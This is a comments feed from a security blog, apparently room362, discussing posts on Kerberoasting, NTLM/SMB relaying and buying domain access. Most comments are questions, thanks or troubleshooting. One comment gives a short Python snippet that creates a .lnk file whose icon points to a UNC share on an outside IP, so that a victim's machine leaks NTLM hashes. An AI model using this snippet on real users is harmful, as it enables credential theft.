room362 - Latest Comments

Re: Kerberoasting - Part 3

3e4r5t6789 — Sun, 07 May 2017 02:38:24 -0000

Does this still work?

Re: Effective NTLM / SMB Relaying

Malcolm Norton — Fri, 21 Apr 2017 23:54:11 -0000

hiya i would like to ask two questions 1) if on target mashine the password not set and the rules set like >not allow blank password use ..if that methods works in workgroup in LAN? 2) how to do the same with intercepter-ng?

Re: Kerberoasting - Part 3

pimps — Sun, 09 Apr 2017 23:57:12 -0000

```
import pylnk
link = pylnk.create("link.lnk")
link.icon = "\\\\192.168.5.100\\test.ico"
link.save()
```

Those 4 python lines have the same effect... Just need a way to force the user to load the link.lnk file generated...

Cheers

Re: Kerberoasting - Part 3

M8 — Sat, 01 Apr 2017 17:48:04 -0000

Does this work on a mac as well, or is it only windows?

Re: Kerberoasting - Part 3

Abdiya Chlouma — Sun, 12 Mar 2017 07:48:38 -0000

very good,nice .

Re: Kerberoasting - Part 3

mame82 — Sat, 25 Feb 2017 15:23:48 -0000

Same approach, but additionally highjacking every public host to force authenticated SMB request on a 5$ Pi Zero: https://github.com/mame82/P...

Re: Kerberoasting - Part 3

Barney — Tue, 21 Feb 2017 05:39:52 -0000

Hello everybody. I have the problem that my windows machine is not recognize the usbarmory as a networkinterface. Also a driver get installed. But still no recognition. On linux it works fine. What is the problem and how can I fix this ???

Greets,
Barney

Re: Kerberoasting - Part 3

mame82 — Sat, 18 Feb 2017 05:03:41 -0000

HI. implemented the same on a Pi Zero. Now the Problem is, that on Win 10 Home 64bit (Build 14393) it takes about 15 minutes till the first request to "http://<responder.host>/wpad.dat" is sent. Any ideas on that ?

Best regards MaMe82

Update: Windows responds immediately but never sends NTLM auth, thanks to MS16-112

Re: Kerberoasting - Part 3

Vito De Laurentis — Sat, 28 Jan 2017 10:08:09 -0000

Mmm is a LM or NTLM or NTLMv2 hash????

Re: Kerberoasting - Part 3

Kasun1906 — Thu, 26 Jan 2017 16:25:25 -0000

hey, nice test, i tried this out but i stuck on win-screen. It seemed to be loading the user-acc but then it jumped back to login-page

Re: Kerberoasting - Part 3

dene dene — Fri, 13 Jan 2017 03:40:40 -0000

any countermeasure ?

Re: Kerberoasting - Part 3

Iam Nikhil — Tue, 10 Jan 2017 03:21:33 -0000

hehe, the other gist has also vanished !!

Re: Buying Internal Domain Access

Plerisei — Mon, 09 Jan 2017 14:56:38 -0000

I'm an iOS Engineer, just getting into pentesting and information security. What you described was impressive. I see the first link is no longer valid, but the second one for xamarin still exists. Thanks for the post. I'm getting into bug bounties, and I wonder if something like this might come in handy one day. That is amazing man. Thanks for the posts.

Re: Kerberoasting - Part 3

Leon Teale — Sun, 08 Jan 2017 15:13:16 -0000

if this is using basic responder then i t shouldnt matter what the TLD is ?

Re: Kerberoasting - Part 3

N8 — Fri, 06 Jan 2017 06:36:51 -0000

Nice test, any considerations taken if the dc's top level domain isn't a .com? Something like a .org?

Re: Kerberoasting - Part 3

mubix — Wed, 04 Jan 2017 01:05:37 -0000

test